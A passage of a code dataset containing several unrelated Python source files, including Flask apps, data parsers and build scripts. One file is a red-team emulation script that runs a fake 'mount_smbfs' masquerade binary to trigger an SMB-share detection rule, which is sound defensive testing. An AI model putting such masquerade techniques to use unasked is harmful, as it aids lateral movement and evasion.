tried.\"\"\"\r\n\r\n__author__ = \"Ahmad Ammari\"\r\n\r\ndef readGenome(filename):\r\n genome = ''\r\n with open(filename, 'r') as f:\r\n for line in f:\r\n # ignore header line with genome information\r\n if not line[0] == '>':\r\n genome += line.rstrip()\r\n return genome\r\n\t\r\n\t\r\ndef naive_with_counts(p, t):\r\n occurrences = []\r\n num_alignments = len(t) - len(p) + 1\r\n num_character_comparisons = 0\r\n for i in range(len(t) - len(p) + 1):\r\n match = True\r\n for j in range(len(p)):\r\n num_character_comparisons += 1\r\n if t[i+j] != p[j]:\r\n match = False\r\n break\r\n if match:\r\n occurrences.append(i)\r\n return (occurrences, num_alignments, num_character_comparisons)\r\n\t\r\n\r\n","repo_name":"anammari/AlgorithmsForDNASequencing","sub_path":"assignments/week2/naive_with_counts.py","file_name":"naive_with_counts.py","file_ext":"py","file_size_in_byte":941,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"83"} +{"seq_id":"34008415892","text":"from flask_app.config.mysqlconnection import connectToMySQL\r\nfrom flask import flash\r\nclass Company():\r\n\r\n def __init__(self,data):\r\n self.id = data['id']\r\n self.name = data['name']\r\n self.rank = data['rank']\r\n self.location =data['location']\r\n self.marketCapitalization =data['marketCapitalization'] \r\n self.news = data['news']\r\n self.create_at =data['create_at']\r\n self.update_at =data['update_at']\r\n\r\n @classmethod\r\n def save(cls, data):\r\n query = \"INSERT INTO companies (`rank`, marketCapitalization, `location`, news, `name`) VALUES ( %(server_rank)s,%(server_marketCapitalization)s,%(server_location)s,%(server_news)s, %(server_name)s);\"\r\n result = connectToMySQL(\"company_schema\").query_db(query,data)\r\n return result\r\n \r\n\r\n @classmethod\r\n def get_all_companies(cls):\r\n query = 'SELECT * FROM companies;'\r\n results = connectToMySQL('company_schema').query_db(query)\r\n companies = []\r\n for each_result in results:\r\n companies.append( Company(each_result) )\r\n return companies\r\n\r\n @classmethod\r\n def get_one_company(cls,data):\r\n query = 'SELECT * FROM companies WHERE id =%(server_id)s'\r\n results = connectToMySQL('company_schema').query_db(query, data)\r\n return Company(results[0])\r\n\r\n @classmethod\r\n def update_company(cls,data):\r\n query = 'UPDATE companies SET `name` = %(server_name)s, `rank` = %(server_rank)s, `location` = %(server_location)s, marketCapitalization = %(server_marketCapitalization)s,news = %(server_news)s WHERE id = %(server_id)s;'\r\n return connectToMySQL('company_schema').query_db( query, data)\r\n\r\n @classmethod\r\n def delete(cls, data):\r\n query = 'DELETE FROM companies WHERE id = %(server_id)s;'\r\n return connectToMySQL('company_schema').query_db( query, data)\r\n\r\n @staticmethod\r\n def validate_new_company(data):\r\n is_valid = True\r\n if data['template_name'] == \"\":\r\n is_valid = False\r\n flash(\"Name should be filled\")\r\n if data['template_rank'] == \"\":\r\n is_valid = False\r\n flash(\"Rank should be filled\")\r\n else:\r\n if int(data['template_rank'])<= 0:\r\n is_valid = False\r\n flash(\"Rank should be a number greater than 0\")\r\n if data['template_location'] == \"\":\r\n is_valid = False\r\n flash(\"Location should be filled\")\r\n if data['template_marketCapitalization'] == \"\":\r\n is_valid = False\r\n flash(\"Market Capitalization should be filled\")\r\n else:\r\n if int(data['template_marketCapitalization'])<= 0:\r\n is_valid = False\r\n flash(\"Market Capitalization should be a number greater than 0\")\r\n if data['template_news'] == \"\":\r\n is_valid = False\r\n flash(\"News should be filled\")\r\n return is_valid\r\n\r\n\r\n","repo_name":"alexschmidt123/company_list","sub_path":"flask_app/models/company.py","file_name":"company.py","file_ext":"py","file_size_in_byte":2990,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"83"} +{"seq_id":"35263578039","text":"#!/usr/bin/env python3\n\"\"\"\nExample module with functions to read, write and parse files.\n\nSimple tests are included in docstrings and run using doctest.\n\nFurther tests are implemented in a separate file using pytest\n(tests/unit_tests/test_file_io.py) to avoid adding test-specific code to\ndocstrings.\n\"\"\"\n\nimport gzip\nimport json\nimport pathlib\nimport yaml\n\n\ndef read_file(filename):\n r\"\"\"\n Read a file, automatically detect gzipped filed based on suffix.\n\n >>> read_file('tests/files/infile')\n 'testfile content\\n'\n >>> read_file('nofile')\n ''\n \"\"\"\n if '.gz' in pathlib.Path(filename).suffixes:\n try:\n with gzip.open(filename, 'rt') as fh:\n return fh.read()\n except OSError:\n return ''\n try:\n with open(filename, 'r') as fh:\n return fh.read()\n except IOError:\n return ''\n\n\ndef load_yaml(filename):\n \"\"\"\n Parse a JSON/YAML file.\n\n load_yaml('identifiers.yaml')\n \"\"\"\n data = read_file(filename)\n identifiers = yaml.load(data)\n return identifiers\n\n\ndef write_file(filename, data):\n \"\"\"\n Write a file, use suffix to determine type and compression.\n\n - types: '.json', '.yaml'\n - compression: None, '.gz'\n\n write_file('variable.json.gz')\n \"\"\"\n if '.json' in filename:\n content = json.dumps(data, indent=1)\n elif '.yaml' in filename:\n content = yaml.dump(data, indent=1)\n else:\n content = data\n if '.gz' in filename:\n try:\n with gzip.open(filename, 'wt') as fh:\n fh.write(content)\n except OSError:\n return False\n else:\n try:\n with open(filename, 'wt') as fh:\n fh.write(content)\n except IOError:\n return False\n return True\n\n\nif __name__ == '__main__':\n import doctest\n doctest.testmod()\n","repo_name":"rjchallis/test","sub_path":"lib/file_io.py","file_name":"file_io.py","file_ext":"py","file_size_in_byte":1873,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"83"} +{"seq_id":"40557024523","text":"# blogCapstone.py\n#\n# Python Bootcamp Day 59 - Flask Blog Capstone\n# Usage:\n# A more robust blog using Flask and JSON data. Day 59 Python Bootcamp.\n#\n# Marceia Egler January 5, 2022\n\nimport json\nfrom flask import Flask, render_template, request\nimport requests\nfrom mailjet_rest import Client\nimport os\nfrom dotenv import dotenv_values\n\nconfig = dotenv_values(\".env\")\n\nmailjet = Client(\n auth=(config[\"api_key\"], config[\"api_secret\"]), version=\"v3.1\"\n)\napp = Flask(__name__)\n\n\n@app.route(\"/\")\ndef home():\n data_endpoint = \"https://api.npoint.io/518f1f99a0306ee5ceea\"\n r = requests.get(data_endpoint)\n all_posts = r.json()\n return render_template(\"index.html\", blog_posts=all_posts)\n\n\n@app.route(\"/about\")\ndef about():\n return render_template(\"about.html\")\n\n\n@app.route(\"/contact\")\ndef contact():\n return render_template(\"contact.html\")\n\n\n@app.route(\"/formSubmit\", methods=[\"POST\"])\ndef formSubmit():\n if request.method == \"POST\":\n name = request.form[\"name\"]\n email = request.form[\"email\"]\n message = request.form[\"message\"]\n data = {\n \"Messages\": [\n {\n \"From\": {\"Email\": email, \"Name\": name},\n \"To\": [\n {\n \"Email\": \"YOUR-EMAIL-ADDRESS@EMAIL.COM\",\n \"Name\": \"YOUR NAME\",\n }\n ],\n \"Subject\": \"Contact Form Submission\",\n \"TextPart\": message,\n \"HTMLPart\": f\"

{message}

\",\n \"CustomID\": \"AppGettingStartedTest\",\n }\n ]\n }\n result = mailjet.send.create(data=data)\n print(result.status_code)\n return render_template(\"contact.html\")\n\n\n@app.route(\"/post/\")\ndef blog(id):\n data_endpoint = \"https://api.npoint.io/518f1f99a0306ee5ceea\"\n r = requests.get(data_endpoint)\n all_posts = r.json()\n id = int(id) - 1\n title = all_posts[id][\"title\"]\n body = all_posts[id][\"body\"]\n subtitle = all_posts[id][\"subtitle\"]\n return render_template(\n \"post.html\", title=title, body=body, subtitle=subtitle\n )\n\n\nif __name__ == \"__main__\":\n app.run(debug=True)\n","repo_name":"megler/Day59-Blog-Capstone","sub_path":"server.py","file_name":"server.py","file_ext":"py","file_size_in_byte":2240,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"83"} +{"seq_id":"11085209745","text":"# (C) Datadog, Inc. 2023-present\n# All rights reserved\n# Licensed under a 3-clause BSD style license (see LICENSE)\n\nimport pytest\n\nfrom datadog_checks.weaviate import WeaviateCheck\n\nfrom .common import MOCKED_INSTANCE, get_fixture_path\n\npytestmark = pytest.mark.integration\n\n\ndef test_check_mock_weaviate_metadata(datadog_agent, mock_http_response):\n mock_http_response(file_path=get_fixture_path('weaviate_meta_api.json'))\n check = WeaviateCheck('weaviate', {}, [MOCKED_INSTANCE])\n check.check_id = 'test:123'\n check._submit_version_metadata()\n raw_version = '1.19.1'\n\n major, minor, patch = raw_version.split('.')\n version_metadata = {\n 'version.scheme': 'semver',\n 'version.major': major,\n 'version.minor': minor,\n 'version.patch': patch,\n 'version.raw': raw_version,\n }\n\n datadog_agent.assert_metadata('test:123', version_metadata)\n","repo_name":"DataDog/integrations-core","sub_path":"weaviate/tests/test_integration.py","file_name":"test_integration.py","file_ext":"py","file_size_in_byte":898,"program_lang":"python","lang":"en","doc_type":"code","stars":820,"dataset":"github-code","pt":"83"} +{"seq_id":"20632893926","text":"#matplotlib\nimport matplotlib.pyplot as plt\n#skimage\nimport skimage as io \nfrom skimage import color,data\nfrom skimage.filters import threshold_otsu\nfrom skimage.filters import gaussian\n#numpy\nimport numpy as np\n#PIL\nfrom PIL import Image\n\n#Funcion para ver dos imagenes\ndef plot_comparison(original, filtered, title):\n fig, (ax1, ax2) = plt.subplots(ncols=2, figsize=(8,6), sharex=True, sharey=True)\n ax1.imshow(original, cmap = plt.cm.gray)\n ax1.set_title(\"Original\")\n ax1.axis(\"off\")\n ax2.imshow(filtered, cmap = plt.cm.gray)\n ax2.set_title(title)\n ax2.axis(\"off\")\n\n#Extraer una mano\ndef extractHand(carpeta):\n #arreglo para la mano\n handy = [0,0,0,0,0]\n\n for x in range(0,5):\n #Leer imagen \n matrixFinger = plt.imread(\"./Images/sub\"+str(carpeta)+\"/\"+str(carpeta)+str(x+1)+\".jpg\")\n #Suavizar\n #gaussianFinger = gaussian(matrixFinger, multichannel= False)\n #Convertir a gris\n grayFinger = color.rgb2gray(matrixFinger)\n #Convertir matriz a arreglo\n fingerInVector = np.concatenate(grayFinger)\n fingerInList = fingerInVector.tolist()\n handy[x] = fingerInList\n #Convertir la mano en una matriz\n handyInMatrix = np.array(handy)\n #transponemos la matriz de la mano para que los dedos esten en las columnas\n transposeHandy = np.transpose(handyInMatrix)\n #haciendo el SVD\n u,s,vh = np.linalg.svd(transposeHandy, full_matrices = False)\n #transponemos la matriz U para sacar la columna\n transposeU = np.transpose(u)\n #devolver matriz U \n return transposeU[0] \n \n#Base de datos\ndataBase = []\n\n#Extraer todas las manos y guardarlas en nuestro arreglo dataBase\nfor i in range(1,51):\n dataBase.append(extractHand(i))\n\n#rint(dataBase[0])\n\nhandy = [0,0,0,0,0]\n\nfor x in range(0,5):\n #Leer imagen \n matrixFinger = plt.imread(\"./Images/newFile/\"+str(x+1)+\".jpg\")\n #Suavizar\n #gaussianFinger = gaussian(matrixFinger, multichannel= False)\n #Convertir a gris\n grayFinger = color.rgb2gray(matrixFinger)\n #Convertir matriz a arregloss\n fingerInVector = np.concatenate(grayFinger)\n fingerInList = fingerInVector.tolist()\n handy[x] = fingerInList\n#Convertir la mano en una matriz\nhandyInMatrix = np.array(handy)\ntransposeHandy = np.transpose(handyInMatrix) \n\n#sacar los residuos \nresiduos = []\nfor i in range(0,50):\n #usamos la funcion lstsq para obtener el residuo vectorial \n x, residual,rank,singular = np.linalg.lstsq(transposeHandy,dataBase[i],-1)\n #pasamos los residuos en formato lista\n residualList = residual.tolist()\n #metemos los residuos en un array para buscar al sujeto \n residuos.append(residualList)\n\n#El sujeto sera aquel cuya posicion en el arreglo tenga el numero\nsujeto = np.amin(residuos)\n\nprint(0.000000000000000000000001)\nif (sujeto > 0.000000000000000000001):\n print(\"El sujeto no se encuentra en la base de datos\")\n exit()\n\nprint(sujeto)\n\n#Buscando al sujeto \nfor i in range(0,50):\n if (sujeto == residuos[i]):\n print(\"La mano pertenece al sujeto \"+str(i+1))\n break\n\n\n\n#lstsq\n\n\n","repo_name":"AndresGiron/EscanerDactilar","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":3088,"program_lang":"python","lang":"es","doc_type":"code","stars":0,"dataset":"github-code","pt":"83"} +{"seq_id":"43328184587","text":"import launch\nimport launch.actions\nfrom launch.substitutions import LaunchConfiguration, PathJoinSubstitution\nfrom launch_ros.actions import Node\nimport os\nfrom ament_index_python.packages import get_package_share_directory\nimport subprocess\n\n\ndef generate_launch_description():\n pkg_ur_bringup = get_package_share_directory('ur_bringup')\n pkg_ur10e_moveit2_controller = get_package_share_directory('ur10e_moveit2_controller')\n pkg_zed = get_package_share_directory('zed_wrapper')\n pkg_pcd_demo = get_package_share_directory('pcd_demo')\n\n moveit_launch = PathJoinSubstitution([pkg_ur_bringup, 'launch', 'ur_control.launch.py'])\n rviz_launch = PathJoinSubstitution([pkg_ur_bringup, 'launch', 'ur_moveit.launch.py'])\n ur10e_moveit2_controller_launch = PathJoinSubstitution([pkg_ur10e_moveit2_controller, 'launch', 'controller.launch.py'])\n pcd_to_ply_launch = PathJoinSubstitution([pkg_pcd_demo, 'launch', 'pcd_to_ply_pause.launch.py'])\n zed_launch = PathJoinSubstitution([pkg_zed, 'launch', 'zed2.launch.py'])\n\n tf_static = Node(package='tf2_ros',\n executable='static_transform_publisher',\n arguments=['0.0', '0.0', '0.0', '2.36', '-1.57', '0.0', 'tool0', 'camera_mount'])\n\n moveit = launch.actions.IncludeLaunchDescription(\n launch.launch_description_sources.PythonLaunchDescriptionSource([moveit_launch]),\n launch_arguments={'ur_type': 'ur10e',\n 'robot_ip': '192.168.2.5',\n 'use_fake_hardware': 'false',\n 'launch_rviz': 'false',\n 'initial_joint_controller': 'joint_trajectory_controller'}.items()\n )\n\n rviz = launch.actions.IncludeLaunchDescription(\n launch.launch_description_sources.PythonLaunchDescriptionSource([rviz_launch]),\n launch_arguments={'ur_type': 'ur10e',\n 'robot_ip': '192.168.2.5',\n 'use_fake_hardware': 'false',\n 'launch_rviz': 'true'}.items()\n )\n\n controller = launch.actions.IncludeLaunchDescription(\n launch.launch_description_sources.PythonLaunchDescriptionSource([ur10e_moveit2_controller_launch]),\n launch_arguments=[]\n )\n\n pcd_to_ply = launch.actions.IncludeLaunchDescription(\n launch.launch_description_sources.PythonLaunchDescriptionSource([pcd_to_ply_launch]),\n launch_arguments=[]\n )\n\n zed = launch.actions.IncludeLaunchDescription(\n launch.launch_description_sources.PythonLaunchDescriptionSource([zed_launch]),\n launch_arguments={'publish_tf': 'false',\n 'publish_map_tf': 'false',\n 'base_frame': 'camera_mount'}.items()\n )\n\n ld = launch.LaunchDescription()\n ld.add_action(moveit)\n ld.add_action(rviz)\n ld.add_action(tf_static)\n ld.add_action(zed)\n ld.add_action(pcd_to_ply)\n\n return ld\n","repo_name":"FlorianPix/ur10e_moveit2_controller","sub_path":"launch/bringup_real_ur10e.launch.py","file_name":"bringup_real_ur10e.launch.py","file_ext":"py","file_size_in_byte":2934,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"83"} +{"seq_id":"27213496939","text":"from __future__ import print_function\n\nimport os\nimport subprocess\n\nfrom setuptools import setup\nfrom setuptools.command.develop import develop\nfrom setuptools.command.install import install\nfrom nmosauth.auth_server.constants import NMOSAUTH_DIR\n\nGEN_CERT_FILE = 'gen_cert.py'\nGEN_CERT_PATH = os.path.join(NMOSAUTH_DIR, GEN_CERT_FILE)\n\n\n# Basic metadata\nname = \"nmos-auth\"\nversion = \"1.5.0\"\ndescription = \"OAuth2 Server Implementation\"\nurl = 'https://github.com/bbc/nmos-auth-server'\nauthor = 'Danny Meloy'\nauthor_email = 'danny.meloy@bbc.co.uk'\nlicense = 'Apache2'\nlong_description = \"OAuth2 Server Implementation to produce JWTs for API Access\"\n\n\ndef gen_certs():\n try:\n subprocess.call([GEN_CERT_PATH])\n except Exception as e:\n print('Error: {}. Failed to generate certificates.'.format(str(e)))\n print('Please run \"{}\" in {}'.format(GEN_CERT_FILE, NMOSAUTH_DIR))\n pass\n\n\nclass PostDevelopCommand(develop):\n \"\"\"Post-installation for development mode.\"\"\"\n def run(self):\n develop.run(self)\n gen_certs()\n\n\nclass PostInstallCommand(install):\n \"\"\"Post-installation for installation mode.\"\"\"\n def run(self):\n install.run(self)\n gen_certs()\n\n\ndef is_package(path):\n return (\n os.path.isdir(path) and os.path.isfile(os.path.join(path, '__init__.py'))\n )\n\n\ndef find_packages(path, base=\"\"):\n \"\"\" Find all packages in path \"\"\"\n packages = {}\n for item in os.listdir(path):\n dir = os.path.join(path, item)\n if is_package(dir):\n if base:\n module_name = \"%(base)s.%(item)s\" % vars()\n else:\n module_name = item\n packages[module_name] = dir\n packages.update(find_packages(dir, module_name))\n return packages\n\n\npackages = find_packages(\".\")\npackage_names = packages.keys()\n\n# This is where you list packages which are required\npackages_required = [\n \"six\",\n \"flask\",\n \"sqlalchemy\",\n \"flask-sqlalchemy\",\n \"flask-cors\",\n \"requests\",\n \"gevent\",\n \"nmoscommon\",\n \"werkzeug>=0.14.1,<1.0.0\", # Echo pin from nmos-common to avoid Flask overriding it\n \"authlib>=0.13,<0.15\", # 0.15 requires an update to client_registration.py parsing incoming token for user\n \"pyopenssl>=16.0\",\n \"cryptography>=1.5\"\n]\n\ndeps_required = []\n\nsetup(\n name=name,\n version=version,\n description=description,\n url=url,\n author=author,\n author_email=author_email,\n license=license,\n packages=package_names,\n package_dir=packages,\n install_requires=packages_required,\n include_package_data=True,\n scripts=[\n 'bin/nmosauth'\n ],\n package_data={\n 'nmosauth': ['auth_server/templates/*', 'auth_server/static/*']\n },\n data_files=[\n ('/usr/bin', ['bin/nmosauth']),\n (NMOSAUTH_DIR, ['nmosauth/certs/{}'.format(GEN_CERT_FILE)])\n ],\n long_description=long_description,\n cmdclass={\n 'develop': PostDevelopCommand,\n 'install': PostInstallCommand\n }\n)\n","repo_name":"bbc/nmos-auth-server","sub_path":"setup.py","file_name":"setup.py","file_ext":"py","file_size_in_byte":3022,"program_lang":"python","lang":"en","doc_type":"code","stars":10,"dataset":"github-code","pt":"63"} +{"seq_id":"18383528978","text":"import numpy as np\nimport json\n\ndef json_to_matrices(json_data):\n m = len(json_data['spdd']) # number of orders\n\n # Create a dictionary to map goods to units\n goods_dict = {}\n for warehouse in json_data['ck']:\n warehouse_id = list(warehouse.keys())[0]\n for good in warehouse[warehouse_id]:\n if good['spnm'] not in goods_dict:\n goods_dict[good['spnm']] = good['lg']\n \n # Create a list of warehouses based on their order in 'ckdata'\n all_warehouses = [data['cknm'] for order in json_data['spdd'] for data in order['ckdata']]\n \n # Removing duplicates while preserving the order\n all_warehouses = list(dict.fromkeys(all_warehouses))\n\n all_goods_spdd = [order['spnm'] for order in json_data['spdd']]\n all_goods_ck = list(goods_dict.keys())\n all_goods = sorted(list(set(all_goods_spdd + all_goods_ck)))\n k = len(all_goods) # Number of unique goods\n n = len(all_warehouses) # number of warehouses\n \n # Initialize matrices\n A1 = np.zeros((m, n, k))\n A2 = np.zeros((m, k))\n A3 = np.zeros((n, k))\n # W1 = 1 / np.arange(1, m+1) # We consider the priority of orders to be inversely proportional to their order\n # W2 = 1 / np.arange(1, n+1) # We consider the priority of warehouses to be inversely proportional to their order\n W1 = np.arange(m, 0, -1) / m * 0.3 + 0.7 # We consider the priority of orders to decrease by a fixed interval\n W2 = np.arange(n, 0, -1) / n * 0.3 + 0.7 # We consider the priority of warehouses to decrease by a fixed interval\n \n for i, order in enumerate(json_data['spdd']):\n good_id = all_goods.index(order['spnm'])\n A2[i, good_id] = order['sl']\n for j, ckdata in enumerate(order['ckdata']):\n A1[i, j, good_id] = ckdata['dwyssj']\n \n for warehouse in json_data['ck']:\n warehouse_id = list(warehouse.keys())[0]\n if warehouse_id in all_warehouses:\n i = all_warehouses.index(warehouse_id)\n for good in warehouse[warehouse_id]:\n good_id = all_goods.index(good['spnm'])\n A3[i, good_id] = good['sl']\n\n order_list = json_data['spdd']\n warehouse_list = all_warehouses\n goods_list = all_goods\n \n return A1, A2, A3, W1, W2, order_list, warehouse_list, goods_list, goods_dict\n\nif __name__=='__main__':\n with open('data/data_5.txt', 'r') as f:\n json_data = json.load(f)\n A1, A2, A3, W1, W2, order_list, warehouse_list, goods_list, goods_dict = json_to_matrices(json_data)\n print(order_list)\n print(warehouse_list)\n print(goods_list)\n print(goods_dict)\n\n# fix this code, \n# currently, `all_warehouses = [data['cknm'] for order in json_data['spdd'] for data in order['ckdata']]`\n# is not correct, because it count the warehouse with same cknm(warehous id) multiple times","repo_name":"SuuTTT/wuliu","sub_path":"src/util.py","file_name":"util.py","file_ext":"py","file_size_in_byte":2837,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"63"} +{"seq_id":"2241255776","text":"from . import common\nfrom . import RtaMetadata\n\n\nmetadata = RtaMetadata(\n uuid=\"d275922f-a702-4668-a77d-c60e8df58646\",\n platforms=[\"macos\"],\n endpoint=[],\n siem=[\n {\"rule_name\": \"Attempt to Mount SMB Share via Command Line\", \"rule_id\": \"661545b4-1a90-4f45-85ce-2ebd7c6a15d0\"}\n ],\n techniques=[\"T1021\"],\n)\n\n\n@common.requires_os(*metadata.platforms)\ndef main():\n\n masquerade = \"/tmp/mount_smbfs\"\n common.create_macos_masquerade(masquerade)\n\n # Execute command\n common.log(\"Launching fake mount_smbfs command to mimic mounting a network share.\")\n common.execute([masquerade], timeout=10, kill=True)\n\n # cleanup\n common.remove_file(masquerade)\n\n\nif __name__ == \"__main__\":\n exit(main())\n","repo_name":"elastic/detection-rules","sub_path":"rta/mount_smbfs.py","file_name":"mount_smbfs.py","file_ext":"py","file_size_in_byte":732,"program_lang":"python","lang":"en","doc_type":"code","stars":1654,"dataset":"github-code","pt":"63"} +{"seq_id":"70298004362","text":"# -*- mode: python ; coding: utf-8 -*-\n\nblock_cipher = None\n\n\na = Analysis(['ciao_control'],\n pathex=['C:\\\\Home\\\\Programmation\\\\Projets\\\\CIAO_win\\\\control'],\n binaries=[],\n datas=[],\n hiddenimports=[],\n hookspath=[],\n runtime_hooks=[],\n excludes=[],\n win_no_prefer_redirects=False,\n win_private_assemblies=False,\n cipher=block_cipher,\n noarchive=False)\npyz = PYZ(a.pure, a.zipped_data,\n cipher=block_cipher)\nexe = EXE(pyz,\n a.scripts,\n a.binaries,\n a.zipfiles,\n a.datas,\n [],\n name='ciao_control',\n debug=False,\n bootloader_ignore_signals=False,\n strip=False,\n upx=True,\n upx_exclude=[],\n runtime_tmpdir=None,\n console=True )\n","repo_name":"lucashrm/AOC","sub_path":"for git ciao win/control/ciao_control.spec","file_name":"ciao_control.spec","file_ext":"spec","file_size_in_byte":887,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"63"} +{"seq_id":"70192236040","text":"# -*- coding: utf-8 -*-\n\nfrom odoo import models, fields, api\n\nclass Invoice_line(models.Model):\n _inherit= 'account.move.line'\n\n weight=fields.Float(\n related='product_id.weight',\n )\n default_code=fields.Char(\n related='product_id.default_code',\n )\n standard_price=fields.Float(\n related='product_id.standard_price',\n )\n date_invoice=fields.Date(\n related='account_id.invoice_date',\n store=True,\n )\n number=fields.Char(\n related='account_id.number',\n store=True,\n )\n name_invoice=fields.Char(\n related='account_id.name',\n store=True,\n )\n state=fields.Selection(\n related='account_id.state',\n store=True,\n )\n total_weight=fields.Float(\n compute='_total_weight',\n store=True,\n )\n user_id=fields.Many2one(\n related='account_id.invoice_user_id',\n string='Vendedor',\n store=True,\n )\n type_currency = fields.Monetary(\n related='account_id.type_currency',\n store=True,\n )\n price_subtotal_company=fields.Monetary(\n compute='_subtotal_company',\n store=True,\n\n )\n price_per_kg=fields.Float(\n compute='_price_per_kg',\n string='precio por Kg',\n store=True,\n )\n price_total_company=fields.Monetary(\n compute='_total_company',\n store=True,\n )\n re_facturado=fields.Boolean(\n related='account_id.re_facturado',\n string='Re-Facturado',\n store=True,\n )\n\n facturado_to=fields.Boolean(\n related='account_id.facturado_to',\n string='Facturado a:',\n store=True,\n )\n\n not_accumulate=fields.Boolean(\n related='account_id.not_accumulate',\n string='No Acumular',\n store=True,\n )\n\n date_applied = fields.Date(\n related='account_id.date_applied',\n string='Fecha Aplicada',\n store=True,\n )\n\n\n @api.depends('weight','quantity')\n def _total_weight(self):\n for r in self:\n r.total_weight=r.quantity*r.weight\n\n @api.depends('type_currency','price_subtotal')\n def _subtotal_company(self):\n for r in self:\n r.price_subtotal_company=r.price_subtotal*r.type_currency\n\n @api.depends('type_currency','price_total')\n def _total_company(self):\n for r in self:\n r.price_total_company=r.price_total*r.type_currency\n\n @api.depends('price_subtotal_company','total_weight')\n def _price_per_kg(self):\n for r in self:\n if r.total_weight!=0:\n if r.price_subtotal_company!=0:\n r.price_per_kg=r.price_subtotal_company/r.total_weight\n else:\n r.price_per_kg=0\n else:\n r.price_per_kg=0\n","repo_name":"humanytek/enva12","sub_path":"prod_nova/informes_invoice/models/account_invoice_line.py","file_name":"account_invoice_line.py","file_ext":"py","file_size_in_byte":2766,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"63"} +{"seq_id":"21646321356","text":"from torch.autograd import Function\r\nimport torch\r\n# Inherit from Function\r\nclass LinearFunction(Function):\r\n\r\n # Note that both forward and backward are @staticmethods\r\n @staticmethod\r\n # bias is an optional argument\r\n def forward(ctx, input, weight, bias=None):\r\n ctx.save_for_backward(input, weight, bias)\r\n output = input.mm(weight.t())\r\n if bias is not None:\r\n output += bias.unsqueeze(0).expand_as(output)\r\n return output\r\n\r\n # This function has only a single output, so it gets only one gradient\r\n @staticmethod\r\n def backward(ctx, grad_output):\r\n # This is a pattern that is very convenient - at the top of backward\r\n # unpack saved_tensors and initialize all gradients w.r.t. inputs to\r\n # None. Thanks to the fact that additional trailing Nones are\r\n # ignored, the return statement is simple even when the function has\r\n # optional inputs.\r\n input, weight, bias = ctx.saved_tensors\r\n grad_input = grad_weight = grad_bias = None\r\n\r\n # These needs_input_grad checks are optional and there only to\r\n # improve efficiency. If you want to make your code simpler, you can\r\n # skip them. Returning gradients for inputs that don't require it is\r\n # not an error.\r\n if ctx.needs_input_grad[0]:\r\n grad_input = grad_output.mm(weight)\r\n if ctx.needs_input_grad[1]:\r\n grad_weight = grad_output.t().mm(input)\r\n if bias is not None and ctx.needs_input_grad[2]:\r\n grad_bias = grad_output.sum(0)\r\n\r\n return grad_input, grad_weight, grad_bias\r\nlinear = LinearFunction.apply\r\n\r\nprint(linear(torch.rand([10, 10]), torch.rand([10, 10])))","repo_name":"Ehaschia/DiscourseDependencyParsing","sub_path":"ncrfae/tests/grad.py","file_name":"grad.py","file_ext":"py","file_size_in_byte":1725,"program_lang":"python","lang":"en","doc_type":"code","stars":7,"dataset":"github-code","pt":"63"} +{"seq_id":"41776196691","text":"'''\r\nCreated on 2020. 2. 3.\r\n\r\n@author: GDJ-19\r\n'''\r\nimport pandas as pd \r\ninput_file=\"sales_2013.xlsx\"\r\noutput_file = \"pandas_output4.xls\"\r\ndata_frame = pd.read_excel\\\r\n (input_file,\"january_2013\",index_col=None)\r\n\r\ndata_frame_value = data_frame.loc\\\r\n [:,[\"Customer ID\",\"Sale Amount\",\"Purchase Date\"]]\r\n \r\nwriter = pd.ExcelWriter(output_file)\r\ndata_frame_value.to_excel\\\r\n (writer,sheet_name=\"jan_13_output\",index=False)\r\n\r\n#저장\r\nwriter.save()","repo_name":"yangyohan123/python","sub_path":"pythontest/0203/pandasexcelex4.py","file_name":"pandasexcelex4.py","file_ext":"py","file_size_in_byte":509,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"63"} +{"seq_id":"21036506427","text":"import fitz\nfrom .dataparser import DataParser\n# Handbook of Signs & Symptoms\n\nHANDBOOK_PATH = \"./raw_data/HandbookofSignsAndSymptoms.pdf\"\nHANDBOOK_JSON_PATH = \"./processed_data/handbookofsignsandsymptoms.json\"\n\nclass HandbookDataParser(DataParser):\n def __init__(self):\n super().__init__(HANDBOOK_JSON_PATH)\n self.header2page = {} # for credits\n\n def prepare_embedding(self):\n for line in self.data:\n headers = list(line.keys())\n bigheader = headers[0]\n for header in headers:\n for text in line[header]['paragraphs']:\n # add the header to the text to increase relevance with embedding queries\n text_with_header = bigheader\n if bigheader != header:\n text_with_header += ' ' + header\n text_with_header += \": \" + text\n self.embedding_text.append(text_with_header)\n self.documents.append(text)\n\n def create_credits(self):\n for line in self.data:\n headers = list(line.keys())\n for header in headers:\n for text in line[header]['paragraphs']:\n self.credits[text] = line[header]['page']\n\n def parse_data(self):\n self.data = []\n self.header2page = {}\n\n headers = []\n connected = False\n displaying_graphic = False\n\n last_font = ''\n last_bbox = 0\n last_header = None\n\n page_n = 0\n\n current_result = {}\n\n pdf = fitz.open(HANDBOOK_PATH) \n for page in pdf[11:717]:\n dict = page.get_text(\"dict\")\n blocks = dict[\"blocks\"]\n for block in blocks:\n if \"lines\" in block.keys():\n spans = block['lines']\n for span in spans:\n data = span['spans']\n for lines in data:\n if GraphicFont.match(lines['font']):\n displaying_graphic = True\n if displaying_graphic and not RegularFont.match(lines['font']) and round(lines['size']) != 10:\n continue\n else:\n displaying_graphic = False\n\n connected = PDFFont.get_cls(last_font).match(lines['font'])\n indent = (last_bbox !=0 and last_bbox[0]+2 < lines['bbox'][0] and last_bbox[1]+1 < lines['bbox'][1] and RegularFont.match(lines['font']))\n \n if lines['font'] == \"Minion-SwashDisplayItalic\" and lines['size'] < 40:\n # Big fancy letter.\n if current_result:\n current_result_with_page = {}\n for key, value in current_result.items():\n current_result_with_page[key] = {'paragraphs': value, 'page': self.header2page[key]}\n self.data.append(current_result_with_page)\n current_result = {}\n\n if HeaderFont.match(lines['font']) and lines['size'] < 40:\n if not connected:\n last_header = lines['text'].lower()\n headers.append(last_header)\n else:\n if len(last_header) > 1: last_header += ' '\n last_header += 